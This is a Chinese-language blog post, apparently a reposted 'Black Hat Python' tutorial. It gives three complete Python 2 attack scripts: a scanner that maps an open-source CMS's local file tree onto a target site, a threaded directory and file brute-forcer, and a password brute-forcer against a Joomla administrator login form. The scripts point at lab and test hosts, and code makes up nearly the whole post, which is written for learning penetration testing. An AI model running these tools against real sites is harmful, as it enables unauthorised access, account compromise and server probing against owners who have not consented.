  • Python黑帽子:Web目录暴力破解

    开源Web应用目录扫描器

    这里的前提是目标Web服务器使用开源CMS建站,并且自己在本地也下载了一套相同的开源代码:脚本遍历本地代码目录得到文件路径,再逐一请求目标站点上的对应路径。由于前提条件比较苛刻,感觉实际意义并不大。

    #!/usr/bin/python
    #coding=utf-8
    import Queue
    import threading
    import os
    import urllib2
    
    # Number of worker threads started at the bottom of the script.
    threads = 10

    # Base URL of the site being checked, and the local copy of the same
    # application's source tree that supplies the file names to request.
    target = "http://10.10.10.144/dunling"
    directory = "/dunling"
    # Extensions that are left out of the queue.
    filters = [".jpg",".gif",".png",".css"]

    # Walk the tree from inside it so every collected path is relative to its root.
    os.chdir(directory)

    web_paths = Queue.Queue()

    for root, _subdirs, names in os.walk("."):
        for name in names:
            if os.path.splitext(name)[1] in filters:
                continue
            candidate = "%s/%s"%(root,name)
            # Paths from os.walk(".") begin with "."; dropping it leaves a
            # path that starts with "/" and can be appended to the base URL.
            if candidate.startswith("."):
                candidate = candidate[1:]
            web_paths.put(candidate)
    
    def test_remote():
        """Request every queued path on the target and print the ones that answer.

        Paths are taken from the module-level ``web_paths`` queue and appended
        to ``target``.  A response that urlopen returns normally is printed as
        ``[status] => path``; an HTTPError is dropped without output.

        No User-Agent header is set, so urllib2 sends its default one.  On the
        server this shows up as one client requesting the application's stock
        file names in quick succession.
        """
        while not web_paths.empty():
            remote = web_paths.get()
            req = urllib2.Request("%s%s"%(target,remote))

            try:
                resp = urllib2.urlopen(req)
                # The body is read and discarded; only the status code is reported.
                resp.read()

                print "[%d] => %s"%(resp.code,remote)
                resp.close()
            except urllib2.HTTPError:
                # Error statuses (404, 403, ...) are ignored silently.
                continue
    
    # Start the workers; they all drain the same web_paths queue.
    for thread_no in range(threads):
        print "Spawning thread : %d"%thread_no
        worker = threading.Thread(target=test_remote)
        worker.start()

    暴力破解目录和文件位置

    #!/usr/bin/python
    #coding=utf-8
    
    import urllib2
    import threading
    import Queue
    import urllib
    
    # Number of worker threads started at the bottom of the script.
    threads = 50
    # Base URL that every candidate path is appended to.
    target_url = "http://testphp.vulnweb.com"
    wordlist_file = "/tmp/all.txt" # from SVNDigger
    # When set to a word from the list, build_wordlist skips everything up to
    # and including that word; None means the whole list is used.
    resume = None
    # Sent as the User-Agent header on every request in place of urllib2's default.
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    
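    def build_wordlist(wordlist_file):
        """Load the wordlist file into a queue, one right-stripped line per entry.

        When the module-level ``resume`` is None, every line is queued.
        Otherwise lines are skipped up to and including the first one equal to
        ``resume`` and only the lines after it are queued; if no line matches,
        the returned queue is empty.

        Returns a Queue.Queue of the selected words in file order.
        """
        # The context manager closes the file even if reading fails part-way.
        with open(wordlist_file,"rb") as fd:
            raw_words = fd.readlines()

        found_resume = False
        words = Queue.Queue()

        for word in raw_words:
            word = word.rstrip()

            if resume is None or found_resume:
                words.put(word)
            elif word == resume:
                # The resume word itself is not queued, only what follows it.
                found_resume = True
                print "Resuming wordlist from: %s"%resume

        return words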
    
    def dir_bruter(word_queue,extensions=None):
        """Request the paths derived from each queued word and print the hits.

        word_queue -- queue of words, as returned by build_wordlist.
        extensions -- optional list of suffixes; each one is appended to every
                      word to form an additional candidate path.

        Responses with a non-empty body are printed as ``[status] => url``.
        Errors that carry a status code other than 404 are printed with a
        ``!!!`` prefix; 404s and errors without a code produce no output.

        Every request carries the fixed ``user_agent`` string, so on the server
        side the run is recognisable by its rate of requests for missing paths
        from one client rather than by its User-Agent.
        """
        while not word_queue.empty():
            attempt = word_queue.get()

            # A word without a dot is requested as a directory (trailing slash),
            # a word with a dot as a file.
            if "." in attempt:
                candidates = ["/%s"%attempt]
            else:
                candidates = ["/%s/"%attempt]

            # Optional extension variants of the same word.
            if extensions:
                candidates.extend("/%s%s"%(attempt,suffix) for suffix in extensions)

            for candidate in candidates:
                url = "%s%s"%(target_url,urllib.quote(candidate))

                try:
                    req = urllib2.Request(url,headers={"User-Agent": user_agent})
                    response = urllib2.urlopen(req)

                    if response.read():
                        print "[%d] => %s"%(response.code,url)
                except urllib2.URLError as e:
                    # Plain URLError has no status code; HTTPError does.
                    if not hasattr(e,'code') or e.code == 404:
                        continue
                    print "!!! %d => %s"%(e.code,url)
    
    # One shared queue of words, plus the suffixes tried for each of them.
    word_queue = build_wordlist(wordlist_file)
    extensions = [".php",".bak",".orig",".inc"]

    # Every worker drains the same queue.
    for _ in range(threads):
        worker = threading.Thread(target=dir_bruter,args=(word_queue,extensions))
        worker.start()

    暴力破解HTML表单认证

    1、检索登录页面,接受所有返回的cookies值;

    2、从HTML中获取所有表单元素;

    3、在你的字典中设置需要猜测的用户名和密码;

    4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单字段和存储的cookies值;

    5、测试是否能登录成功。

    #!/usr/bin/python
    #coding=utf-8
    
    import urllib2
    import urllib
    import cookielib
    import threading
    import sys
    import Queue
    
    from HTMLParser import HTMLParser
    
    # General settings
    user_thread = 10
    username = "admin"
    wordlist_file = "/tmp/passwd.txt"
    resume = None
    
    # Target-specific settings
    # target_url is fetched first to collect cookies and the form's input
    # fields; target_post receives the filled-in form.
    target_url = "http://10.10.10.144/Joomla/administrator/index.php"
    target_post = "http://10.10.10.144/Joomla/administrator/index.php"
    
    # Names of the form inputs that carry the username and the password.
    username_field = "username"
    password_field = "passwd"
    
    # Text whose presence in the login response is taken as a successful login.
    success_check = "Administration - Control Panel"
    
    class Bruter(object):
        """Try each queued password for one username against the configured login form.

        Uses the module-level settings ``user_thread``, ``target_url``,
        ``target_post``, ``username_field``, ``password_field`` and
        ``success_check``.
        """
        def __init__(self, username, words):
            self.username = username
            # Queue of candidate passwords shared by all worker threads.
            self.password_q = words
            # Set once a login response contains success_check; the other
            # workers see it at their next loop check and stop.
            self.found = False

            print "Finished setting up for: %s"%username

        def run_bruteforce(self):
            """Start ``user_thread`` threads, each running web_bruter."""
            for _ in range(user_thread):
                worker = threading.Thread(target=self.web_bruter)
                worker.start()

        def web_bruter(self):
            """Worker loop: one GET of the login page plus one POST per password.

            On the server each attempt appears as a GET/POST pair for the same
            username from the same client, which is the pattern that login
            throttling and account lockout act on.
            """
            while not (self.password_q.empty() or self.found):
                candidate = self.password_q.get().rstrip()
                # A new cookie jar per attempt: cookies are not carried over
                # from one attempt to the next.
                jar = cookielib.FileCookieJar("cookies")
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

                page = opener.open(target_url).read()

                print "Trying: %s : %s (%d left)"%(self.username,candidate,self.password_q.qsize())

                # Collect the form's input fields from the login page.
                parser = BruteParser()
                parser.feed(page)

                # Overlay the username and the current password on the collected fields.
                form_fields = parser.tag_results
                form_fields[username_field] = self.username
                form_fields[password_field] = candidate

                login_response = opener.open(target_post,urllib.urlencode(form_fields))

                if success_check not in login_response.read():
                    continue

                self.found = True

                print "[*] Bruteforce successful. "
                print "[*] Username: %s"%self.username
                print "[*] Password: %s"%candidate
                print "[*] Waiting for other threads to exit ... "
    
    class BruteParser(HTMLParser):
        """Collect the named <input> elements of a page into ``tag_results``.

        After feed(), ``tag_results`` maps each input's name attribute to the
        value recorded for it by handle_starttag.
        """
        def __init__(self):
            HTMLParser.__init__(self)
            # name attribute -> recorded value, filled in by handle_starttag.
            self.tag_results = {}
    
        def handle_starttag(self,tag,attrs):
            # attrs is iterated as (name, value) pairs; only <input> tags are processed.
            if tag == "input":
                tag_name = None
                tag_value = None
                for name,value in attrs:
                    if name == "name":
                        tag_name = value
                    if name == "value":
                        tag_value = value
                    # NOTE(review): this check sits inside the attribute loop and
                    # stores the loop variable `value`; `tag_value` is assigned
                    # above but never read.  Once a name attribute has been seen,
                    # the entry is overwritten on every remaining attribute, so it
                    # ends up holding the last attribute of the tag, which is the
                    # value attribute only when that attribute is written last.
                    if tag_name is not None:
                        self.tag_results[tag_name] = value
    
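    def build_wordlist(wordlist_file):
        """Load the wordlist file into a queue, one right-stripped line per entry.

        When the module-level ``resume`` is None, every line is queued.
        Otherwise lines are skipped up to and including the first one equal to
        ``resume`` and only the lines after it are queued; if no line matches,
        the returned queue is empty.

        Returns a Queue.Queue of the selected words in file order.
        """
        # The context manager closes the file even if reading fails part-way.
        with open(wordlist_file,"rb") as fd:
            raw_words = fd.readlines()

        found_resume = False
        words = Queue.Queue()

        for word in raw_words:
            word = word.rstrip()

            if resume is None or found_resume:
                words.put(word)
            elif word == resume:
                # The resume word itself is not queued, only what follows it.
                found_resume = True
                print "Resuming wordlist from: %s"%resume

        return words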
    
    # Load the candidate passwords into a queue.
    words = build_wordlist(wordlist_file)
    
    # Set up the run for the configured username and start the worker threads.
    brute_obj = Bruter(username,words)
    brute_obj.run_bruteforce()
  • 原文地址:https://www.cnblogs.com/LyShark/p/9102019.html